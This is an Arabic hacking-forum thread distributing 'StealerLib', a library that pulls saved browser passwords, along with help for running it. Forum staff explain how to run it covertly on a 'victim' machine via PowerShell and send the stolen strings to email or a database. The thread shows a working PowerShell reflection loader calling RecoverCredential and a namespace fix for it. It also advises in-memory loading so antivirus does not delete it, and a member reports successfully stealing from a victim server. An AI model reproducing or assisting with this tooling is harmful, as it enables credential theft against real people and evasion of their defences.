مكتبة StealerLib تعمل على فريم ورك 2.0


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,568
2,963
1
حياكم الله ..
المكتبة بعد الحذف اللي قمت فيه تجلب لك فقط باس وردات المتصفحات التالية

1935


اللي مهتم فيهم فقط او باحدهم وبده المكتبة تشتغل على فريم ورك 2.0
يحمل من المرفقات
الاستخدام "كمثال"

المحتوى المخفي متاح للمستخدمين المسجلين!

الصورة محتواها التالي ..

المحتوى المخفي متاح للمستخدمين المسجلين!

حيث ان 77,99 رمز لبايتات المكتبة اللي بالمرفقات .
تقدر تجيب البايتات م خلال مثلا .

المحتوى المخفي متاح للمستخدمين المسجلين!
للتحميل

المحتوى المخفي متاح للمستخدمين المسجلين!


ابرا الى الله عز وجل من اي استخدام في معصية
 
التعديل الأخير:

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,568
2,963
1
يعطيك العافية يا بشار مافهمت الطريقة الاستخدام جديد على C# :15:
اهلا بك اخي الحبيب تريد تستخدمها على سي شارب ؟
الاستغلال هنا من خلال باور شيل
بس كود السي شارب لتوليد البايتات الخاصة بالمكتبة لااكثر ..
لو تريد تستخدمها على سي شارب استخدم اداتي لان لو استخدمت المكتبة لوحدها رح تعطيك سترينج فوين بدك تودي هاد السترينج ؟
اما ترسله للايميل مثل موضوع نيان
او ترسله للداتا بيس مالتك مثل موضوعي "اداتي"
او ان بدك تشغله بجهاز المستخدم ف اول كود بتنفذه بالباور شيل مال المستخدم وثاني كود ناقصه بايتات المكتبة اللي بالمرفقات قم بتوليد البايتات من خلال كود السي شارب
وضعهم محل الرقمين اللي بالكود الثاني ..
لو تريد شرح فديو اخبرني لعيونك
بس حدد لي عن طريق ايش بدك تشغل المكتبة وكيف حابب تحصل عالنتائج
 
  • أعجبني
التفاعلات: 3losh-rat، Mr.Ali و ViRusRat

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,568
2,963
1
ياليت يا بشار ما ودي اتعبك معي بس المكتبة رهيبة ابيها عن طريقة السي شارب :]d (4):
من عيوني اخي الحبيب .بس فهمني عشان افهمك خخ
هل انت رح تشغل الملف بجهاز الضحية اللي هوة عندك
او هل رح تخترق بس بهاد الملف ؟
لو بس بههاد الملف سؤالي الك هوة وين بدك يروح ناتج تشغيل المكتبة ؟ على ايميلك او على الداتا بيس تعيتك
لانن هي المكتبة رح تعطيك سترينج تمام اخي ؟
ف يااما بتستخدمها بشكل مخفي على الضحية اللي عندك من خلال باور شيل
او اما بتخترق فيها وهون لازم يوصلك الناتج تبعها صح ؟ فهاد هوة سؤالي البدي اعرف جوابو
وين بدك يوصلك السترينج الناتج
 
  • أعجبني
التفاعلات: 3losh-rat، Mr.Ali و ViRusRat

annaba23

:: عضو جديد ::
20 نوفمبر 2018
18
28
annaba
0
شكرا عمل رائع تمنيت لو عندي الوقت لادرس لغة البور شل والسي شارب اعرف بعض القواعد لا أكتر لم ممكن مراجع للبور شل او سورسات جاهزة تزودونا بها
 

ViRusRat

Legend Administrator
Legend Administrator
18 نوفمبر 2018
203
258
0
ههههه
عندي ضحية قديمة ولايقبل سحب الباس بأي برنامج اختراق ابي يسحب الباس ويرسله للايميل
هو الجهاز عبارة عن سيرفر
وهل اقدر اطلع الباس من جهازي اول ابي اجرب اسحب الي بجهازي لاني انسى رمز بعض بعض المواقع :15:
 

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,568
2,963
1
ههههه
عندي ضحية قديمة ولايقبل سحب الباس بأي برنامج اختراق ابي يسحب الباس ويرسله للايميل
هو الجهاز عبارة عن سيرفر
وهل اقدر اطلع الباس من جهازي اول ابي اجرب اسحب الي بجهازي لاني انسى رمز بعض بعض المواقع :15:
ننعم يمكنك سحب باس ورداتك اخي الحبيب هه
شوف الفديو هنا عشان ضحيتك وعشان تسحب من جهازك ..انا صورت الفديو لاحد الشباب هنا البارحة يمكن لا ماعرف مثلك يستخدم الاداة




انن مافهمت كمان خبرني بسوي فديو جديد
 
  • أعجبني
  • أحببته
التفاعلات: 3losh-rat، Mr.Ali و ViRusRat

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,568
2,963
1
شكرا عمل رائع تمنيت لو عندي الوقت لادرس لغة البور شل والسي شارب اعرف بعض القواعد لا أكتر لم ممكن مراجع للبور شل او سورسات جاهزة تزودونا بها
دور بالقسم هنا اخي الحبيب بتشوف دورة للسي شارب انا نزلتها ..
او فوت بروفايلي واستعرض مواضيعي تلقاها
عشان سورسات ان شاء الله بالمستقبل ارفع لكم كل السورسات اللي عندي ..للاسف انحذفت باكملها من فترة عام وماقدرت استرجع الكثير منهم
بس يبقو الموجودين ممتازين
الان يلزمك متابعة دورة للسي شارب
 
  • أعجبني
التفاعلات: Mr.Ali و ViRusRat

annaba23

:: عضو جديد ::
20 نوفمبر 2018
18
28
annaba
0
الطريقة هده عملت بشكل جيد لكن الطريقة التانية التي تعتمد على وضع ملف المكتبة في احد الاقراص وتشغيل البورشل لم تعمل هدا الخطأ الدي أصادفه
Impossible de convertir la valeur « StealerLib.Browsers.CaptureBrowsers » du type « System.String » en type « Syste
m.Type ».
Au niveau de ligne : 8 Caractère : 43
+ $Type = [type] $Full_Class_Name <<<<
+ CategoryInfo : NotSpecified: (:) [], RuntimeException
+ FullyQualifiedErrorId : RuntimeException

Vous ne pouvez pas appeler de méthode sur une expression ayant la valeur Null.
Au niveau de ligne : 9 Caractère : 30
+ $MethodInfo = $Type.GetMethod <<<< ($Method)
+ CategoryInfo : InvalidOperation: (GetMethod:String) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull

Vous ne pouvez pas appeler de méthode sur une expression ayant la valeur Null.
Au niveau de ligne : 10 Caractère : 19
+ $MethodInfo.Invoke <<<< ($null, $Arguments)
+ CategoryInfo : InvalidOperation: (Invoke:String) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull

 
  • أعجبني
التفاعلات: Mr.Ali

ViRusRat

Legend Administrator
Legend Administrator
18 نوفمبر 2018
203
258
0
ننعم يمكنك سحب باس ورداتك اخي الحبيب هه
شوف الفديو هنا عشان ضحيتك وعشان تسحب من جهازك ..انا صورت الفديو لاحد الشباب هنا البارحة يمكن لا ماعرف مثلك يستخدم الاداة




انن مافهمت كمان خبرني بسوي فديو جديد
يعطيك العافية تعبتك معي يا بشار فهمت تأخرت بالرد اجرب :)
وتم السحب :(172)[1]: شكرا يا بشار مرة اخرى :]d (4)::]d (4)::]d (4)::]d (4)::]d (4)::]d (4)::]d (4)::]d (4):
 
  • أعجبني
التفاعلات: Mr.Ali و BasharBachir

annaba23

:: عضو جديد ::
20 نوفمبر 2018
18
28
annaba
0
أقصد هدا الكود ما اشتغل معاي
$Path = "D:\StealerLib.dll"
$Namespace = "StealerLib.Browsers"
$ClassName = "CaptureBrowsers"
$Method = "RecoverCredential"
$Arguments = $null
Add-Type -Path $Path
$Full_Class_Name = "$Namespace.$ClassName"
$Type = [type] $Full_Class_Name
$MethodInfo = $Type.GetMethod($Method)
$MethodInfo.Invoke($null, $Arguments)
 
  • أعجبني
التفاعلات: Mr.Ali

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,568
2,963
1
الطريقة هده عملت بشكل جيد لكن الطريقة التانية التي تعتمد على وضع ملف المكتبة في احد الاقراص وتشغيل البورشل لم تعمل هدا الخطأ الدي أصادفه
Impossible de convertir la valeur « StealerLib.Browsers.CaptureBrowsers » du type « System.String » en type « Syste
m.Type ».
Au niveau de ligne : 8 Caractère : 43
+ $Type = [type] $Full_Class_Name <<<<
+ CategoryInfo : NotSpecified: (:) [], RuntimeException
+ FullyQualifiedErrorId : RuntimeException

Vous ne pouvez pas appeler de méthode sur une expression ayant la valeur Null.
Au niveau de ligne : 9 Caractère : 30
+ $MethodInfo = $Type.GetMethod <<<< ($Method)
+ CategoryInfo : InvalidOperation: (GetMethod:String) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull

Vous ne pouvez pas appeler de méthode sur une expression ayant la valeur Null.
Au niveau de ligne : 10 Caractère : 19
+ $MethodInfo.Invoke <<<< ($null, $Arguments)
+ CategoryInfo : InvalidOperation: (Invoke:String) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
اسم النيم سبيس مختلف بالمكتبة اللي عدلتها اول مرة عن المكتبة هنا اللي عدلتها ثاني مرة
لهيك لازم تستبدل الاصل باللي هنا
$Namespace = "StealerLib"

فقط استبدل السطر هنالك باللي هنا
انت جيت تستخدم الطريقة لتشغيل المكتبة المعدلة اول مرة من قبلي على المكتبة الثانية
مارح ينفع لان انا غيرت المشروع وبالتالي تغير اسم النيم سبيس
بالتوفيق
 
  • أعجبني
التفاعلات: Mr.Ali

annaba23

:: عضو جديد ::
20 نوفمبر 2018
18
28
annaba
0
فعلا اشتغلا شكرا عمل رائع لكن حبيت اعرف لو ممكن نشفر المكتبة لان برامج الحماية تحدفها يعني لو رفعتها على الجهاز تقوم بحدفها ممكن الطريقة لو امكن
 
  • أعجبني
التفاعلات: BasharBachir و Mr.Ali

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,568
2,963
1
فعلا اشتغلا شكرا عمل رائع لكن حبيت اعرف لو ممكن نشفر المكتبة لان برامج الحماية تحدفها يعني لو رفعتها على الجهاز تقوم بحدفها ممكن الطريقة لو امكن
ليش ترفعها اصلا عالجهاز دام فيه طريقة تشغلها بالذاكرة .
 
  • أعجبني
التفاعلات: Mr.Ali و 3losh-rat

إخلاء مسؤلية

  • المنتدى غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به protection-tips غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به من بيع وشراء وإتفاق وأعطاء معلومات موقعه التعليقات المنشورة لا تعبر عن رأي معهد المنتدى ولا نتحمل أي مسؤولية قانونية حيال ذلك (ويتحمل كاتبها مسؤولية النشر).).

الإنتقال السريع

User Menu

تابعنا على الفيسبوك